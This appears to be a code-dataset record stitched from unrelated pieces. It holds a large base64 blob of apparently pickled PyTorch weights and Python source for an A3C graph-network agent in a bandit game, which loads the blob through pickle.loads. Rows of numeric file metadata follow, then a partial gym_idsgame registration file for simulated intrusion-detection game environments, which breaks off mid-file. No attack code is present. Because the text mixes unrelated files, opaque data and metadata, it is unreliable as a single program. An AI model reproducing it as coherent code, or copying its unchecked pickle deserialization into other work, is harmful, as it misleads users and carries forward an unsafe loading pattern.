X4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAByFQEAAIVyFgEAAFJyFwEAA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WVycy4wLnRyYW5zZm9ybV9mZWF0dXJlc3JPAQAAfXJQAQAAakYBAABLAXNYIAAAAGJhc2UubGF5ZXJzLjAucmVjb21iaW5lX2ZlYXR1cmVzclEBAAB9clIBAABqRgEAAEsBc1gNAAAAYmFzZS5sYXllcnMuMXJTAQAAfXJUAQAAakYBAABLAXNYHQAAAGJhc2UubGF5ZXJzLjEuYWN0aXZhdGlvbl9mdW5jclUBAAB9clYBAABqRgEAAEsBc1ggAAAAYmFzZS5sYXllcnMuMS50cmFuc2Zvcm1fZmVhdHVyZXNyVwEAAH1yWAEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy4xLnJlY29tYmluZV9mZWF0dXJlc3JZAQAAfXJaAQAAakYBAABLAXNYDQAAAGJhc2UubGF5ZXJzLjJyWwEAAH1yXAEAAGpGAQAASwFzWB0AAABiYXNlLmxheWVycy4yLmFjdGl2YXRpb25fZnVuY3JdAQAAfXJeAQAAakYBAABLAXNYIAAAAGJhc2UubGF5ZXJzLjIudHJhbnNmb3JtX2ZlYXR1cmVzcl8BAAB9cmABAABqRgEAAEsBc1ggAAAAYmFzZS5sYXllcnMuMi5yZWNvbWJpbmVfZmVhdHVyZXNyYQEAAH1yYgEAAGpGAQAASwFzWA0AAABiYXNlLmxheWVycy4zcmMBAAB9cmQBAABqRgEAAEsBc1gdAAAAYmFzZS5sYXllcnMuMy5hY3RpdmF0aW9uX2Z1bmNyZQEAAH1yZgEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy4zLnRyYW5zZm9ybV9mZWF0dXJlc3JnAQAAfXJoAQAAakYBAABLAXNYIAAAAGJhc2UubGF5ZXJzLjMucmVjb21iaW5lX2ZlYXR1cmVzcmkBAAB9cmoBAABqRgEAAEsBc1gNAAAAYmFzZS5sYXllcnMuNHJrAQAAfXJsAQAAakYBAABLAXNYHQAAAGJhc2UubGF5ZXJzLjQuYWN0aXZhdGlvbl9mdW5jcm0BAAB9cm4BAABqRgEAAEsBc1ggAAAAYmFzZS5sYXllcnMuNC50cmFuc2Zvcm1fZmVhdHVyZXNybwEAAH1ycAEAAGpGAQAASwFzWCAAAABiYXNlLmxheWVycy40LnJlY29tYmluZV9mZWF0dXJlc3JxAQAAfXJyAQAAakYBAABLAXNYBQAAAGFjdG9ycnMBAAB9cnQBAABqRgEAAEsBc1gVAAAAYWN0b3IuYWN0aXZhdGlvbl9mdW5jcnUBAAB9cnYBAABqRgEAAEsBc1gYAAAAYWN0b3IudHJhbnNmb3JtX2ZlYXR1cmVzcncBAAB9cngBAABqRgEAAEsBc1gYAAAAYWN0b3IucmVjb21iaW5lX2ZlYXR1cmVzcnkBAAB9cnoBAABqRgEAAEsBc1gGAAAAY3JpdGljcnsBAAB9cnwBAABqRgEAAEsBc1gWAAAAY3JpdGljLmFjdGl2YXRpb25fZnVuY3J9AQAAfXJ+AQAAakYBAABLAXNYGQAAAGNyaXRpYy50cmFuc2Zvcm1fZmVhdHVyZXNyfwEAAH1ygAEAAGpGAQAASwFzWBkAAABjcml0aWMucmVjb21iaW5lX2ZlYXR1cmVzcoEBAAB9coIBAABqRgEAAEsBc3VzYnMu'
import base64
import pickle
import torch
from torch import distributions, nn
import torch.nn.functional as F
class FullyConnectedGNNLayer(nn.Module):
def __init__(self, n_nodes, in_features, out_features, activation_func=nn.ReLU(), squeeze_out=False):
super().__init__()
self.n_nodes = n_nodes
self.activation_func = activation_func
self.transform_features = nn.Linear(in_features, out_features)
self.message_passing_mat = nn.Parameter(
(torch.ones((n_nodes, n_nodes)) - torch.eye(n_nodes)) / (n_nodes - 1),
requires_grad=False
)
self.recombine_features = nn.Linear(out_features*2, out_features)
self.squeeze_out = squeeze_out
# Initialize linear layer weights
nn.init.normal_(self.transform_features.weight, mean=0., std=0.2)
nn.init.normal_(self.recombine_features.weight, mean=0., std=0.2)
nn.init.constant_(self.transform_features.bias, 0.)
nn.init.constant_(self.recombine_features.bias, 0.)
def forward(self, features):
features_transformed = self.activation_func(
self.transform_features(features)
)
messages = torch.matmul(self.message_passing_mat, features_transformed)
features_messages_combined = self.activation_func(
self.recombine_features(torch.cat([features_transformed, messages], dim=-1))
)
if self.squeeze_out:
return features_messages_combined.squeeze(dim=-1)
else:
return features_messages_combined
class GraphNN_Residual_Base(nn.Module):
def __init__(self, layers, skip_connection_n):
super().__init__()
assert skip_connection_n >= 1
self.layers = nn.ModuleList(layers)
self.skip_connection_n = skip_connection_n
def forward(self, x):
identity = None
for layer_num, layer in enumerate(self.layers):
if (len(self.layers) - layer_num - 1) % self.skip_connection_n == 0:
x = layer(x)
if identity is not None:
x += identity
identity = x
else:
x = layer(x)
return x
class GraphNN_A3C(nn.Module):
def __init__(self, in_features, n_nodes, n_hidden_layers, layer_sizes,
activation_func = nn.ReLU(), skip_connection_n=2):
super().__init__()
# Define network
if type(layer_sizes) == int:
layer_sizes = [layer_sizes] * (n_hidden_layers + 1)
assert len(layer_sizes) == n_hidden_layers + 1, f'len(layer_sizes) must equal n_hidden_layers + 1, was {len(layer_sizes)} but should have been {n_hidden_layers+1}'
layers = [FullyConnectedGNNLayer(n_nodes, in_features, layer_sizes[0], activation_func=activation_func)]
for i in range(n_hidden_layers):
layers.append(FullyConnectedGNNLayer(n_nodes, layer_sizes[i], layer_sizes[i+1], activation_func=activation_func))
if skip_connection_n == 0:
self.base = nn.Sequential(*layers)
else:
self.base = GraphNN_Residual_Base(layers, skip_connection_n)
self.actor = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=nn.Identity(), squeeze_out=True)
self.critic = FullyConnectedGNNLayer(n_nodes, layer_sizes[-1], 1, activation_func=nn.Identity(), squeeze_out=True)
def forward(self, states):
base_out = self.base(states)
return self.actor(base_out), self.critic(base_out).mean(dim=-1)
def sample_action(self, states):
with torch.no_grad():
logits, _ = self.forward(states)
probs = F.softmax(logits, dim=-1)
batch_size, n_envs, n_players, n_bandits = probs.shape
m = distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits))
return m.sample().view(batch_size, n_envs, n_players)
def choose_best_action(self, states):
with torch.no_grad():
logits, _ = self.forward(states)
return logits.argmax(dim=-1)
def loss_func(self, states, actions, v_t):
#print(f'states.shape: {states.shape}, actions.shape: {actions.shape}, v_t.shape: {v_t.shape}')
logits, values = self.forward(states)
#print(f'logits.shape: {logits.shape}, values.shape: {values.shape}')
td = v_t - values
#critic_loss = td.pow(2).view(-1)
# Huber loss
critic_loss = F.smooth_l1_loss(v_t, values, reduction='none').view(-1)
probs = F.softmax(logits, dim=-1)
batch_size, n_envs, n_players, n_bandits = probs.shape
m = distributions.Categorical(probs.view(batch_size * n_envs * n_players, n_bandits))
#print(f'm.log_prob(actions.view(batch_size * n_envs * n_players)).shape: {m.log_prob(actions.view(batch_size * n_envs * n_players)).shape}, td.shape: {td.shape}')
actor_loss = -(m.log_prob(actions.view(-1)) * td.detach().view(-1))
total_loss = (critic_loss + actor_loss).mean()
return total_loss
class A3C_Agent():
def __init__(self, configuration, serialized_string):
self.n_bandits = configuration.banditCount
self.n_steps = 1999 # TODO: Get this info from configuration somehow?
self.total_reward = 0
self.pull_rewards = torch.zeros((self.n_bandits, 1), dtype=torch.float)
self.player_n_pulls = torch.zeros((self.n_bandits, 2), dtype=torch.float)
state_dict_bytes = base64.b64decode(serialized_string)
state_dicts = pickle.loads(state_dict_bytes)
self.model = GraphNN_A3C(
in_features=3,
n_nodes=100,
n_hidden_layers=4,
layer_sizes=16,
skip_connection_n=1
)
self.model.load_state_dict(state_dicts['model_state_dict'])
self.model.eval()
def get_obs(self):
# Obs must be of shape (n_batches, n_envs, n_players, n_bandits, n_features
# Since we are only selecting an action for a single agent, this translates to: (1, 1, 1, n_bandits, -1)
return torch.cat([
self.player_n_pulls,
self.pull_rewards
], dim=-1).view(1, 1, 1, self.n_bandits, -1) * self.n_bandits / self.n_steps
def get_action(self, observation):
if observation.step > 0:
# Get r
r = observation.reward - self.total_reward
self.total_reward = observation.reward
# Update pull_rewards and player_n_pulls
opp_last_act = observation.lastActions[not observation.agentIndex]
self.pull_rewards[self.last_act] += r
self.player_n_pulls[self.last_act, 0] += 1
self.player_n_pulls[opp_last_act, 1] += 1
self.last_act = self.model.choose_best_action(self.get_obs()).item()
return self.last_act
curr_agent = None
def agent(observation, configuration):
global curr_agent
if curr_agent is None:
curr_agent = A3C_Agent(configuration, serialized_string)
return curr_agent.get_action(observation)
| 2,451.532164
| 412,003
| 0.935474
| 25,314
| 419,212
| 15.481433
| 0.056767
| 1.662222
| 2.413759
| 3.112246
| 0.896052
| 0.895266
| 0.894978
| 0.894911
| 0.894911
| 0.894758
| 0
| 0.179871
| 0.004415
| 419,212
| 170
| 412,004
| 2,465.952941
| 0.759117
| 0.001629
| 0
| 0.138462
| 0
| 0.015385
| 0.984698
| 0.984383
| 0
| 1
| 0
| 0.005882
| 0.015385
| 1
| 0.1
| false
| 0.015385
| 0.038462
| 0.007692
| 0.246154
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
ce2f49e195238d794195159c311941a5c13d3f91
| 67,081
|
py
|
Python
|
gym_idsgame/__init__.py
|
lrakotoarivony/gym-idsgame
|
b5eb2583e87dc37ac1735d28b97241fd51199374
|
[
"MIT"
] | null | null | null |
gym_idsgame/__init__.py
|
lrakotoarivony/gym-idsgame
|
b5eb2583e87dc37ac1735d28b97241fd51199374
|
[
"MIT"
] | null | null | null |
gym_idsgame/__init__.py
|
lrakotoarivony/gym-idsgame
|
b5eb2583e87dc37ac1735d28b97241fd51199374
|
[
"MIT"
] | 1
|
2022-01-11T13:25:16.000Z
|
2022-01-11T13:25:16.000Z
|
"""
Register OpenAI Envs
"""
from gym.envs.registration import register
# -------- Cyber Version ------------
register(
id='idsgame-cyber-v0',
entry_point='gym_idsgame.envs:IdsGameCyberEnv',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 0 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 0
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v0',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV0Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 0
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v0',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV0Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 0
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v0',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV0Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 0
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v0',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV0Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 0
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v0',
entry_point='gym_idsgame.envs:IdsGameV0Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 1 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 1
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v1',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV1Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 1
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v1',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV1Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 1
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v1',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV1Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 1
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v1',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV1Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 1
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v1',
entry_point='gym_idsgame.envs:IdsGameV1Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 2 ------------
